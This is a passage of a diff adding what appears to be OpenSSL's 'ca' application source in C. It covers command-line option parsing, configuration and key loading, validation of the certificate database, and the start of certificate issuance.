+    " -msie_hack      - msie modifications to handle all those universal strings\n",
+    " -revoke file    - Revoke a certificate (given in file)\n",
+    " -subj arg       - Use arg instead of request's subject\n",
+    " -utf8           - input characters are UTF8 (default ASCII)\n",
+    " -multivalue-rdn - enable support for multivalued RDNs\n",
+    " -extensions ..  - Extension section (override value in config file)\n",
+    " -extfile file   - Configuration file with X509v3 extentions to add\n",
+    " -crlexts ..     - CRL extension section (override value in config file)\n",
+#ifndef OPENSSL_NO_ENGINE
+    " -engine e       - use engine e, possibly a hardware device.\n",
+#endif
+    " -status serial  - Shows certificate status given the serial number\n",
+    " -updatedb       - Updates db for expired certificates\n",
+    NULL
+};
+
+#ifdef EFENCE
+extern int EF_PROTECT_FREE;
+extern int EF_PROTECT_BELOW;
+extern int EF_ALIGNMENT;
+#endif
+
+static void lookup_fail(const char *name, const char *tag);
+static int certify(X509 **xret, char *infile, EVP_PKEY *pkey, X509 *x509,
+                   const EVP_MD *dgst, STACK_OF(OPENSSL_STRING) *sigopts,
+                   STACK_OF(CONF_VALUE) *policy, CA_DB *db,
+                   BIGNUM *serial, char *subj, unsigned long chtype,
+                   int multirdn, int email_dn, char *startdate, char *enddate,
+                   long days, int batch, char *ext_sect, CONF *conf,
+                   int verbose, unsigned long certopt, unsigned long nameopt,
+                   int default_op, int ext_copy, int selfsign);
+static int certify_cert(X509 **xret, char *infile, EVP_PKEY *pkey, X509 *x509,
+                        const EVP_MD *dgst, STACK_OF(OPENSSL_STRING) *sigopts,
+                        STACK_OF(CONF_VALUE) *policy, CA_DB *db,
+                        BIGNUM *serial, char *subj, unsigned long chtype,
+                        int multirdn, int email_dn, char *startdate,
+                        char *enddate, long days, int batch, char *ext_sect,
+                        CONF *conf, int verbose, unsigned long certopt,
+                        unsigned long nameopt, int default_op, int ext_copy,
+                        ENGINE *e);
+static int certify_spkac(X509 **xret, char *infile, EVP_PKEY *pkey,
+                         X509 *x509, const EVP_MD *dgst,
+                         STACK_OF(OPENSSL_STRING) *sigopts,
+                         STACK_OF(CONF_VALUE) *policy, CA_DB *db,
+                         BIGNUM *serial, char *subj, unsigned long chtype,
+                         int multirdn, int email_dn, char *startdate,
+                         char *enddate, long days, char *ext_sect, CONF *conf,
+                         int verbose, unsigned long certopt,
+                         unsigned long nameopt, int default_op, int ext_copy);
+static void write_new_certificate(BIO *bp, X509 *x, int output_der,
+                                  int notext);
+static int do_body(X509 **xret, EVP_PKEY *pkey, X509 *x509,
+                   const EVP_MD *dgst, STACK_OF(OPENSSL_STRING) *sigopts,
+                   STACK_OF(CONF_VALUE) *policy, CA_DB *db, BIGNUM *serial,
+                   char *subj, unsigned long chtype, int multirdn,
+                   int email_dn, char *startdate, char *enddate, long days,
+                   int batch, int verbose, X509_REQ *req, char *ext_sect,
+                   CONF *conf, unsigned long certopt, unsigned long nameopt,
+                   int default_op, int ext_copy, int selfsign);
+static int do_revoke(X509 *x509, CA_DB *db, int ext, char *extval);
+static int get_certificate_status(const char *ser_status, CA_DB *db);
+static int do_updatedb(CA_DB *db);
+static int check_time_format(const char *str);
+char *make_revocation_str(int rev_type, char *rev_arg);
+int make_revoked(X509_REVOKED *rev, const char *str);
+int old_entry_print(BIO *bp, ASN1_OBJECT *obj, ASN1_STRING *str);
+static CONF *conf = NULL;
+static CONF *extconf = NULL;
+static char *section = NULL;
+
+static int preserve = 0;
+static int msie_hack = 0;
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    char *key = NULL, *passargin = NULL;
+    int create_ser = 0;
+    int free_key = 0;
+    int total = 0;
+    int total_done = 0;
+    int badops = 0;
+    int ret = 1;
+    int email_dn = 1;
+    int req = 0;
+    int verbose = 0;
+    int gencrl = 0;
+    int dorevoke = 0;
+    int doupdatedb = 0;
+    long crldays = 0;
+    long crlhours = 0;
+    long crlsec = 0;
+    long errorline = -1;
+    char *configfile = NULL;
+    char *md = NULL;
+    char *policy = NULL;
+    char *keyfile = NULL;
+    char *certfile = NULL;
+    int keyform = FORMAT_PEM;
+    char *infile = NULL;
+    char *spkac_file = NULL;
+    char *ss_cert_file = NULL;
+    char *ser_status = NULL;
+    EVP_PKEY *pkey = NULL;
+    int output_der = 0;
+    char *outfile = NULL;
+    char *outdir = NULL;
+    char *serialfile = NULL;
+    char *crlnumberfile = NULL;
+    char *extensions = NULL;
+    char *extfile = NULL;
+    char *subj = NULL;
+    unsigned long chtype = MBSTRING_ASC;
+    int multirdn = 0;
+    char *tmp_email_dn = NULL;
+    char *crl_ext = NULL;
+    int rev_type = REV_NONE;
+    char *rev_arg = NULL;
+    BIGNUM *serial = NULL;
+    BIGNUM *crlnumber = NULL;
+    char *startdate = NULL;
+    char *enddate = NULL;
+    long days = 0;
+    int batch = 0;
+    int notext = 0;
+    unsigned long nameopt = 0, certopt = 0;
+    int default_op = 1;
+    int ext_copy = EXT_COPY_NONE;
+    int selfsign = 0;
+    X509 *x509 = NULL, *x509p = NULL;
+    X509 *x = NULL;
+    BIO *in = NULL, *out = NULL, *Sout = NULL, *Cout = NULL;
+    char *dbfile = NULL;
+    CA_DB *db = NULL;
+    X509_CRL *crl = NULL;
+    X509_REVOKED *r = NULL;
+    ASN1_TIME *tmptm;
+    ASN1_INTEGER *tmpser;
+    char *f;
+    const char *p;
+    char *const *pp;
+    int i, j;
+    const EVP_MD *dgst = NULL;
+    STACK_OF(CONF_VALUE) *attribs = NULL;
+    STACK_OF(X509) *cert_sk = NULL;
+    STACK_OF(OPENSSL_STRING) *sigopts = NULL;
+#undef BSIZE
+#define BSIZE 256
+    MS_STATIC char buf[3][BSIZE];
+    char *randfile = NULL;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+    char *tofree = NULL;
+    DB_ATTR db_attr;
+
+#ifdef EFENCE
+    EF_PROTECT_FREE = 1;
+    EF_PROTECT_BELOW = 1;
+    EF_ALIGNMENT = 0;
+#endif
+
+    apps_startup();
+
+    conf = NULL;
+    key = NULL;
+    section = NULL;
+
+    preserve = 0;
+    msie_hack = 0;
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    argc--;
+    argv++;
+    while (argc >= 1) {
+        if (strcmp(*argv, "-verbose") == 0)
+            verbose = 1;
+        else if (strcmp(*argv, "-config") == 0) {
+            if (--argc < 1)
+                goto bad;
+            configfile = *(++argv);
+        } else if (strcmp(*argv, "-name") == 0) {
+            if (--argc < 1)
+                goto bad;
+            section = *(++argv);
+        } else if (strcmp(*argv, "-subj") == 0) {
+            if (--argc < 1)
+                goto bad;
+            subj = *(++argv);
+            /* preserve=1; */
+        } else if (strcmp(*argv, "-utf8") == 0)
+            chtype = MBSTRING_UTF8;
+        else if (strcmp(*argv, "-create_serial") == 0)
+            create_ser = 1;
+        else if (strcmp(*argv, "-multivalue-rdn") == 0)
+            multirdn = 1;
+        else if (strcmp(*argv, "-startdate") == 0) {
+            if (--argc < 1)
+                goto bad;
+            startdate = *(++argv);
+        } else if (strcmp(*argv, "-enddate") == 0) {
+            if (--argc < 1)
+                goto bad;
+            enddate = *(++argv);
+        } else if (strcmp(*argv, "-days") == 0) {
+            if (--argc < 1)
+                goto bad;
+            days = atoi(*(++argv));
+        } else if (strcmp(*argv, "-md") == 0) {
+            if (--argc < 1)
+                goto bad;
+            md = *(++argv);
+        } else if (strcmp(*argv, "-policy") == 0) {
+            if (--argc < 1)
+                goto bad;
+            policy = *(++argv);
+        } else if (strcmp(*argv, "-keyfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyfile = *(++argv);
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                goto bad;
+            keyform = str2fmt(*(++argv));
+        } else if (strcmp(*argv, "-passin") == 0) {
+            if (--argc < 1)
+                goto bad;
+            passargin = *(++argv);
+        } else if (strcmp(*argv, "-key") == 0) {
+            if (--argc < 1)
+                goto bad;
+            key = *(++argv);
+        } else if (strcmp(*argv, "-cert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            certfile = *(++argv);
+        } else if (strcmp(*argv, "-selfsign") == 0)
+            selfsign = 1;
+        else if (strcmp(*argv, "-in") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+            req = 1;
+        } else if (strcmp(*argv, "-out") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outfile = *(++argv);
+        } else if (strcmp(*argv, "-outdir") == 0) {
+            if (--argc < 1)
+                goto bad;
+            outdir = *(++argv);
+        } else if (strcmp(*argv, "-sigopt") == 0) {
+            if (--argc < 1)
+                goto bad;
+            if (!sigopts)
+                sigopts = sk_OPENSSL_STRING_new_null();
+            if (!sigopts || !sk_OPENSSL_STRING_push(sigopts, *(++argv)))
+                goto bad;
+        } else if (strcmp(*argv, "-notext") == 0)
+            notext = 1;
+        else if (strcmp(*argv, "-batch") == 0)
+            batch = 1;
+        else if (strcmp(*argv, "-preserveDN") == 0)
+            preserve = 1;
+        else if (strcmp(*argv, "-noemailDN") == 0)
+            email_dn = 0;
+        else if (strcmp(*argv, "-gencrl") == 0)
+            gencrl = 1;
+        else if (strcmp(*argv, "-msie_hack") == 0)
+            msie_hack = 1;
+        else if (strcmp(*argv, "-crldays") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crldays = atol(*(++argv));
+        } else if (strcmp(*argv, "-crlhours") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crlhours = atol(*(++argv));
+        } else if (strcmp(*argv, "-crlsec") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crlsec = atol(*(++argv));
+        } else if (strcmp(*argv, "-infiles") == 0) {
+            argc--;
+            argv++;
+            req = 1;
+            break;
+        } else if (strcmp(*argv, "-ss_cert") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ss_cert_file = *(++argv);
+            req = 1;
+        } else if (strcmp(*argv, "-spkac") == 0) {
+            if (--argc < 1)
+                goto bad;
+            spkac_file = *(++argv);
+            req = 1;
+        } else if (strcmp(*argv, "-revoke") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+            dorevoke = 1;
+        } else if (strcmp(*argv, "-valid") == 0) {
+            if (--argc < 1)
+                goto bad;
+            infile = *(++argv);
+            dorevoke = 2;
+        } else if (strcmp(*argv, "-extensions") == 0) {
+            if (--argc < 1)
+                goto bad;
+            extensions = *(++argv);
+        } else if (strcmp(*argv, "-extfile") == 0) {
+            if (--argc < 1)
+                goto bad;
+            extfile = *(++argv);
+        } else if (strcmp(*argv, "-status") == 0) {
+            if (--argc < 1)
+                goto bad;
+            ser_status = *(++argv);
+        } else if (strcmp(*argv, "-updatedb") == 0) {
+            doupdatedb = 1;
+        } else if (strcmp(*argv, "-crlexts") == 0) {
+            if (--argc < 1)
+                goto bad;
+            crl_ext = *(++argv);
+        } else if (strcmp(*argv, "-crl_reason") == 0) {
+            if (--argc < 1)
+                goto bad;
+            rev_arg = *(++argv);
+            rev_type = REV_CRL_REASON;
+        } else if (strcmp(*argv, "-crl_hold") == 0) {
+            if (--argc < 1)
+                goto bad;
+            rev_arg = *(++argv);
+            rev_type = REV_HOLD;
+        } else if (strcmp(*argv, "-crl_compromise") == 0) {
+            if (--argc < 1)
+                goto bad;
+            rev_arg = *(++argv);
+            rev_type = REV_KEY_COMPROMISE;
+        } else if (strcmp(*argv, "-crl_CA_compromise") == 0) {
+            if (--argc < 1)
+                goto bad;
+            rev_arg = *(++argv);
+            rev_type = REV_CA_COMPROMISE;
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(*argv, "-engine") == 0) {
+            if (--argc < 1)
+                goto bad;
+            engine = *(++argv);
+        }
+#endif
+        else {
+ bad:
+            BIO_printf(bio_err, "unknown option %s\n", *argv);
+            badops = 1;
+            break;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (badops) {
+        const char **pp2;
+
+        for (pp2 = ca_usage; (*pp2 != NULL); pp2++)
+            BIO_printf(bio_err, "%s", *pp2);
+        goto err;
+    }
+
+    ERR_load_crypto_strings();
+
+        /*****************************************************************/
+    tofree = NULL;
+    if (configfile == NULL)
+        configfile = getenv("OPENSSL_CONF");
+    if (configfile == NULL)
+        configfile = getenv("SSLEAY_CONF");
+    if (configfile == NULL) {
+        const char *s = X509_get_default_cert_area();
+        size_t len;
+
+#ifdef OPENSSL_SYS_VMS
+        len = strlen(s) + sizeof(CONFIG_FILE);
+        tofree = OPENSSL_malloc(len);
+        strcpy(tofree, s);
+#else
+        len = strlen(s) + sizeof(CONFIG_FILE) + 1;
+        tofree = OPENSSL_malloc(len);
+        BUF_strlcpy(tofree, s, len);
+        BUF_strlcat(tofree, "/", len);
+#endif
+        BUF_strlcat(tofree, CONFIG_FILE, len);
+        configfile = tofree;
+    }
+
+    BIO_printf(bio_err, "Using configuration from %s\n", configfile);
+    conf = NCONF_new(NULL);
+    if (NCONF_load(conf, configfile, &errorline) <= 0) {
+        if (errorline <= 0)
+            BIO_printf(bio_err, "error loading the config file '%s'\n",
+                       configfile);
+        else
+            BIO_printf(bio_err, "error on line %ld of config file '%s'\n",
+                       errorline, configfile);
+        goto err;
+    }
+    if (tofree) {
+        OPENSSL_free(tofree);
+        tofree = NULL;
+    }
+
+    if (!load_config(bio_err, conf))
+        goto err;
+
+#ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+#endif
+
+    /* Lets get the config section we are using */
+    if (section == NULL) {
+        section = NCONF_get_string(conf, BASE_SECTION, ENV_DEFAULT_CA);
+        if (section == NULL) {
+            lookup_fail(BASE_SECTION, ENV_DEFAULT_CA);
+            goto err;
+        }
+    }
+
+    if (conf != NULL) {
+        p = NCONF_get_string(conf, NULL, "oid_file");
+        if (p == NULL)
+            ERR_clear_error();
+        if (p != NULL) {
+            BIO *oid_bio;
+
+            oid_bio = BIO_new_file(p, "r");
+            if (oid_bio == NULL) {
+                /*-
+                BIO_printf(bio_err,"problems opening %s for extra oid's\n",p);
+                ERR_print_errors(bio_err);
+                */
+                ERR_clear_error();
+            } else {
+                OBJ_create_objects(oid_bio);
+                BIO_free(oid_bio);
+            }
+        }
+        if (!add_oid_section(bio_err, conf)) {
+            ERR_print_errors(bio_err);
+            goto err;
+        }
+    }
+
+    randfile = NCONF_get_string(conf, BASE_SECTION, "RANDFILE");
+    if (randfile == NULL)
+        ERR_clear_error();
+    app_RAND_load_file(randfile, bio_err, 0);
+
+    f = NCONF_get_string(conf, section, STRING_MASK);
+    if (!f)
+        ERR_clear_error();
+
+    if (f && !ASN1_STRING_set_default_mask_asc(f)) {
+        BIO_printf(bio_err, "Invalid global string mask setting %s\n", f);
+        goto err;
+    }
+
+    if (chtype != MBSTRING_UTF8) {
+        f = NCONF_get_string(conf, section, UTF8_IN);
+        if (!f)
+            ERR_clear_error();
+        else if (!strcmp(f, "yes"))
+            chtype = MBSTRING_UTF8;
+    }
+
+    db_attr.unique_subject = 1;
+    p = NCONF_get_string(conf, section, ENV_UNIQUE_SUBJECT);
+    if (p) {
+#ifdef RL_DEBUG
+        BIO_printf(bio_err, "DEBUG: unique_subject = \"%s\"\n", p);
+#endif
+        db_attr.unique_subject = parse_yesno(p, 1);
+    } else
+        ERR_clear_error();
+#ifdef RL_DEBUG
+    if (!p)
+        BIO_printf(bio_err, "DEBUG: unique_subject undefined\n");
+#endif
+#ifdef RL_DEBUG
+    BIO_printf(bio_err, "DEBUG: configured unique_subject is %d\n",
+               db_attr.unique_subject);
+#endif
+
+    in = BIO_new(BIO_s_file());
+    out = BIO_new(BIO_s_file());
+    Sout = BIO_new(BIO_s_file());
+    Cout = BIO_new(BIO_s_file());
+    if ((in == NULL) || (out == NULL) || (Sout == NULL) || (Cout == NULL)) {
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+        /*****************************************************************/
+    /* report status of cert with serial number given on command line */
+    if (ser_status) {
+        if ((dbfile = NCONF_get_string(conf, section, ENV_DATABASE)) == NULL) {
+            lookup_fail(section, ENV_DATABASE);
+            goto err;
+        }
+        db = load_index(dbfile, &db_attr);
+        if (db == NULL)
+            goto err;
+
+        if (!index_index(db))
+            goto err;
+
+        if (get_certificate_status(ser_status, db) != 1)
+            BIO_printf(bio_err, "Error verifying serial %s!\n", ser_status);
+        goto err;
+    }
+
+        /*****************************************************************/
+    /* we definitely need a private key, so let's get it */
+
+    if ((keyfile == NULL) && ((keyfile = NCONF_get_string(conf,
+                                                          section,
+                                                          ENV_PRIVATE_KEY)) ==
+                              NULL)) {
+        lookup_fail(section, ENV_PRIVATE_KEY);
+        goto err;
+    }
+    if (!key) {
+        free_key = 1;
+        if (!app_passwd(bio_err, passargin, NULL, &key, NULL)) {
+            BIO_printf(bio_err, "Error getting password\n");
+            goto err;
+        }
+    }
+    pkey = load_key(bio_err, keyfile, keyform, 0, key, e, "CA private key");
+    if (key)
+        OPENSSL_cleanse(key, strlen(key));
+    if (pkey == NULL) {
+        /* load_key() has already printed an appropriate message */
+        goto err;
+    }
+
+        /*****************************************************************/
+    /* we need a certificate */
+    if (!selfsign || spkac_file || ss_cert_file || gencrl) {
+        if ((certfile == NULL)
+            && ((certfile = NCONF_get_string(conf,
+                                             section,
+                                             ENV_CERTIFICATE)) == NULL)) {
+            lookup_fail(section, ENV_CERTIFICATE);
+            goto err;
+        }
+        x509 = load_cert(bio_err, certfile, FORMAT_PEM, NULL, e,
+                         "CA certificate");
+        if (x509 == NULL)
+            goto err;
+
+        if (!X509_check_private_key(x509, pkey)) {
+            BIO_printf(bio_err,
+                       "CA certificate and CA private key do not match\n");
+            goto err;
+        }
+    }
+    if (!selfsign)
+        x509p = x509;
+
+    f = NCONF_get_string(conf, BASE_SECTION, ENV_PRESERVE);
+    if (f == NULL)
+        ERR_clear_error();
+    if ((f != NULL) && ((*f == 'y') || (*f == 'Y')))
+        preserve = 1;
+    f = NCONF_get_string(conf, BASE_SECTION, ENV_MSIE_HACK);
+    if (f == NULL)
+        ERR_clear_error();
+    if ((f != NULL) && ((*f == 'y') || (*f == 'Y')))
+        msie_hack = 1;
+
+    f = NCONF_get_string(conf, section, ENV_NAMEOPT);
+
+    if (f) {
+        if (!set_name_ex(&nameopt, f)) {
+            BIO_printf(bio_err, "Invalid name options: \"%s\"\n", f);
+            goto err;
+        }
+        default_op = 0;
+    } else
+        ERR_clear_error();
+
+    f = NCONF_get_string(conf, section, ENV_CERTOPT);
+
+    if (f) {
+        if (!set_cert_ex(&certopt, f)) {
+            BIO_printf(bio_err, "Invalid certificate options: \"%s\"\n", f);
+            goto err;
+        }
+        default_op = 0;
+    } else
+        ERR_clear_error();
+
+    f = NCONF_get_string(conf, section, ENV_EXTCOPY);
+
+    if (f) {
+        if (!set_ext_copy(&ext_copy, f)) {
+            BIO_printf(bio_err, "Invalid extension copy option: \"%s\"\n", f);
+            goto err;
+        }
+    } else
+        ERR_clear_error();
+
+        /*****************************************************************/
+    /* lookup where to write new certificates */
+    if ((outdir == NULL) && (req)) {
+
+        if ((outdir = NCONF_get_string(conf, section, ENV_NEW_CERTS_DIR))
+            == NULL) {
+            BIO_printf(bio_err,
+                       "there needs to be defined a directory for new certificate to be placed in\n");
+            goto err;
+        }
+#ifndef OPENSSL_SYS_VMS
+        /*
+         * outdir is a directory spec, but access() for VMS demands a
+         * filename.  In any case, stat(), below, will catch the problem if
+         * outdir is not a directory spec, and the fopen() or open() will
+         * catch an error if there is no write access.
+         *
+         * Presumably, this problem could also be solved by using the DEC C
+         * routines to convert the directory syntax to Unixly, and give that
+         * to access().  However, time's too short to do that just now.
+         */
+# ifndef _WIN32
+        if (access(outdir, R_OK | W_OK | X_OK) != 0)
+# else
+        if (_access(outdir, R_OK | W_OK | X_OK) != 0)
+# endif
+        {
+            BIO_printf(bio_err, "I am unable to access the %s directory\n",
+                       outdir);
+            perror(outdir);
+            goto err;
+        }
+
+        if (app_isdir(outdir) <= 0) {
+            BIO_printf(bio_err, "%s need to be a directory\n", outdir);
+            perror(outdir);
+            goto err;
+        }
+#endif
+    }
+
+        /*****************************************************************/
+    /* we need to load the database file */
+    if ((dbfile = NCONF_get_string(conf, section, ENV_DATABASE)) == NULL) {
+        lookup_fail(section, ENV_DATABASE);
+        goto err;
+    }
+    db = load_index(dbfile, &db_attr);
+    if (db == NULL)
+        goto err;
+
+    /* Lets check some fields */
+    for (i = 0; i < sk_OPENSSL_PSTRING_num(db->db->data); i++) {
+        pp = sk_OPENSSL_PSTRING_value(db->db->data, i);
+        if ((pp[DB_type][0] != DB_TYPE_REV) && (pp[DB_rev_date][0] != '\0')) {
+            BIO_printf(bio_err,
+                       "entry %d: not revoked yet, but has a revocation date\n",
+                       i + 1);
+            goto err;
+        }
+        if ((pp[DB_type][0] == DB_TYPE_REV) &&
+            !make_revoked(NULL, pp[DB_rev_date])) {
+            BIO_printf(bio_err, " in entry %d\n", i + 1);
+            goto err;
+        }
+        if (!check_time_format((char *)pp[DB_exp_date])) {
+            BIO_printf(bio_err, "entry %d: invalid expiry date\n", i + 1);
+            goto err;
+        }
+        p = pp[DB_serial];
+        j = strlen(p);
+        if (*p == '-') {
+            p++;
+            j--;
+        }
+        if ((j & 1) || (j < 2)) {
+            BIO_printf(bio_err, "entry %d: bad serial number length (%d)\n",
+                       i + 1, j);
+            goto err;
+        }
+        while (*p) {
+            if (!(((*p >= '0') && (*p <= '9')) ||
+                  ((*p >= 'A') && (*p <= 'F')) ||
+                  ((*p >= 'a') && (*p <= 'f')))) {
+                BIO_printf(bio_err,
+                           "entry %d: bad serial number characters, char pos %ld, char is '%c'\n",
+                           i + 1, (long)(p - pp[DB_serial]), *p);
+                goto err;
+            }
+            p++;
+        }
+    }
+    if (verbose) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE | BIO_FP_TEXT); /* cannot fail */
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+        TXT_DB_write(out, db->db);
+        BIO_printf(bio_err, "%d entries loaded from the database\n",
+                   sk_OPENSSL_PSTRING_num(db->db->data));
+        BIO_printf(bio_err, "generating index\n");
+    }
+
+    if (!index_index(db))
+        goto err;
+
+        /*****************************************************************/
+    /* Update the db file for expired certificates */
+    if (doupdatedb) {
+        if (verbose)
+            BIO_printf(bio_err, "Updating %s ...\n", dbfile);
+
+        i = do_updatedb(db);
+        if (i == -1) {
+            BIO_printf(bio_err, "Malloc failure\n");
+            goto err;
+        } else if (i == 0) {
+            if (verbose)
+                BIO_printf(bio_err, "No entries found to mark expired\n");
+        } else {
+            if (!save_index(dbfile, "new", db))
+                goto err;
+
+            if (!rotate_index(dbfile, "new", "old"))
+                goto err;
+
+            if (verbose)
+                BIO_printf(bio_err,
+                           "Done. %d entries marked as expired\n", i);
+        }
+    }
+
+        /*****************************************************************/
+    /* Read extentions config file                                   */
+    if (extfile) {
+        extconf = NCONF_new(NULL);
+        if (NCONF_load(extconf, extfile, &errorline) <= 0) {
+            if (errorline <= 0)
+                BIO_printf(bio_err, "ERROR: loading the config file '%s'\n",
+                           extfile);
+            else
+                BIO_printf(bio_err,
+                           "ERROR: on line %ld of config file '%s'\n",
+                           errorline, extfile);
+            ret = 1;
+            goto err;
+        }
+
+        if (verbose)
+            BIO_printf(bio_err, "Successfully loaded extensions file %s\n",
+                       extfile);
+
+        /* We can have sections in the ext file */
+        if (!extensions
+            && !(extensions =
+                 NCONF_get_string(extconf, "default", "extensions")))
+            extensions = "default";
+    }
+
+        /*****************************************************************/
+    if (req || gencrl) {
+        if (outfile != NULL) {
+            if (BIO_write_filename(Sout, outfile) <= 0) {
+                perror(outfile);
+                goto err;
+            }
+        } else {
+            BIO_set_fp(Sout, stdout, BIO_NOCLOSE | BIO_FP_TEXT);
+#ifdef OPENSSL_SYS_VMS
+            {
+                BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+                Sout = BIO_push(tmpbio, Sout);
+            }
+#endif
+        }
+    }
+
+    if ((md == NULL) && ((md = NCONF_get_string(conf,
+                                                section,
+                                                ENV_DEFAULT_MD)) == NULL)) {
+        lookup_fail(section, ENV_DEFAULT_MD);
+        goto err;
+    }
+
+    if (!strcmp(md, "default")) {
+        int def_nid;
+        if (EVP_PKEY_get_default_digest_nid(pkey, &def_nid) <= 0) {
+            BIO_puts(bio_err, "no default digest\n");
+            goto err;
+        }
+        md = (char *)OBJ_nid2sn(def_nid);
+    }
+
+    if ((dgst = EVP_get_digestbyname(md)) == NULL) {
+        BIO_printf(bio_err, "%s is an unsupported message digest type\n", md);
+        goto err;
+    }
+
+    if (req) {
+        if ((email_dn == 1) && ((tmp_email_dn = NCONF_get_string(conf,
+                                                                 section,
+                                                                 ENV_DEFAULT_EMAIL_DN))
+                                != NULL)) {
+            if (strcmp(tmp_email_dn, "no") == 0)
+                email_dn = 0;
+        }
+        if (verbose)
+            BIO_printf(bio_err, "message digest is %s\n",
+                       OBJ_nid2ln(dgst->type));
+        if ((policy == NULL) && ((policy = NCONF_get_string(conf,
+                                                            section,
+                                                            ENV_POLICY)) ==
+                                 NULL)) {
+            lookup_fail(section, ENV_POLICY);
+            goto err;
+        }
+        if (verbose)
+            BIO_printf(bio_err, "policy is %s\n", policy);
+
+        if ((serialfile = NCONF_get_string(conf, section, ENV_SERIAL))
+            == NULL) {
+            lookup_fail(section, ENV_SERIAL);
+            goto err;
+        }
+
+        if (!extconf) {
+            /*
+             * no '-extfile' option, so we look for extensions in the main
+             * configuration file
+             */
+            if (!extensions) {
+                extensions = NCONF_get_string(conf, section, ENV_EXTENSIONS);
+                if (!extensions)
+                    ERR_clear_error();
+            }
+            if (extensions) {
+                /* Check syntax of file */
+                X509V3_CTX ctx;
+                X509V3_set_ctx_test(&ctx);
+                X509V3_set_nconf(&ctx, conf);
+                if (!X509V3_EXT_add_nconf(conf, &ctx, extensions, NULL)) {
+                    BIO_printf(bio_err,
+                               "Error Loading extension section %s\n",
+                               extensions);
+                    ret = 1;
+                    goto err;
+                }
+            }
+        }
+
+        if (startdate == NULL) {
+            startdate = NCONF_get_string(conf, section,
+                                         ENV_DEFAULT_STARTDATE);
+            if (startdate == NULL)
+                ERR_clear_error();
+        }
+        if (startdate && !ASN1_TIME_set_string(NULL, startdate)) {
+            BIO_printf(bio_err,
+                       "start date is invalid, it should be YYMMDDHHMMSSZ or YYYYMMDDHHMMSSZ\n");
+            goto err;
+        }
+        if (startdate == NULL)
+            startdate = "today";
+
+        if (enddate == NULL) {
+            enddate = NCONF_get_string(conf, section, ENV_DEFAULT_ENDDATE);
+            if (enddate == NULL)
+                ERR_clear_error();
+        }
+        if (enddate && !ASN1_TIME_set_string(NULL, enddate)) {
+            BIO_printf(bio_err,
+                       "end date is invalid, it should be YYMMDDHHMMSSZ or YYYYMMDDHHMMSSZ\n");
+            goto err;
+        }
+
+        if (days == 0) {
+            if (!NCONF_get_number(conf, section, ENV_DEFAULT_DAYS, &days))
+                days = 0;
+        }
+        if (!enddate && (days == 0)) {
+            BIO_printf(bio_err,
+                       "cannot lookup how many days to certify for\n");
+            goto err;
+        }
+
+        if ((serial = load_serial(serialfile, create_ser, NULL)) == NULL) {
+            BIO_printf(bio_err, "error while loading serial number\n");
+            goto err;
+        }
+        if (verbose) {
+            if (BN_is_zero(serial))
+                BIO_printf(bio_err, "next serial number is 00\n");
+            else {
+                if ((f = BN_bn2hex(serial)) == NULL)
+                    goto err;
+                BIO_printf(bio_err, "next serial number is %s\n", f);
+                OPENSSL_free(f);
+            }
+        }
+
+        if ((attribs = NCONF_get_section(conf, policy)) == NULL) {
+            BIO_printf(bio_err, "unable to find 'section' for %s\n", policy);
+            goto err;
+        }
+
+        if ((cert_sk = sk_X509_new_null()) == NULL) {
+            BIO_printf(bio_err, "Memory allocation failure\n");
+            goto err;
+        }
+        if (spkac_file != NULL) {
+            total++;
+            j = certify_spkac(&x, spkac_file, pkey, x509, dgst, sigopts,
+                              attribs, db, serial, subj, chtype, multirdn,
+                              email_dn, startdate, enddate, days, extensions,
+                              conf, verbose, certopt, nameopt, default_op,
+                              ext_copy);
+            if (j < 0)
+                goto err;
+            if (j > 0) {
+                total_done++;
+                BIO_printf(bio_err, "\n");
+                if (!BN_add_word(serial, 1))
+                    goto err;
+                if (!sk_X509_push(cert_sk, x)) {
+                    BIO_printf(bio_err, "Memory allocation failure\n");
+                    goto err;
+                }
+                if (outfile) {
+                    output_der = 1;
+                    batch = 1;
+                }
+            }
+        }
+        if (ss_cert_file != NULL) {
+            total++;
+            j = certify_cert(&x, ss_cert_file, pkey, x509, dgst, sigopts,
+                             attribs,
+                             db, serial, subj, chtype, multirdn, email_dn,
+                             startdate, enddate, days, batch, extensions,
+                             conf, verbose, certopt, nameopt, default_op,
+                             ext_copy, e);
+            if (j < 0)
+                goto err;
+            if (j > 0) {
+                total_done++;
+                BIO_printf(bio_err, "\n");
+                if (!BN_add_word(serial, 1))
+                    goto err;
+                if (!sk_X509_push(cert_sk, x)) {
+                    BIO_printf(bio_err, "Memory allocation failure\n");
+                    goto err;
+                }
+            }
+        }
+        if (infile != NULL) {
+            total++;
+            j = certify(&x, infile, pkey, x509p, dgst, sigopts, attribs, db,
+                        serial, subj, chtype, multirdn, email_dn, startdate,
+                        enddate, days, batch, extensions, conf, verbose,
+                        certopt, nameopt, default_op, ext_copy, selfsign);
+            if (j < 0)
+                goto err;
+            if (j > 0) {
+                total_done++;
+                BIO_printf(bio_err, "\n");
+                if (!BN_add_word(serial, 1))
+                    goto err;
+                if (!sk_X509_push(cert_sk, x)) {
+                    BIO_printf(bio_err, "Memory allocation failure\n");
+                    goto err;
+                }
+            }
+        }
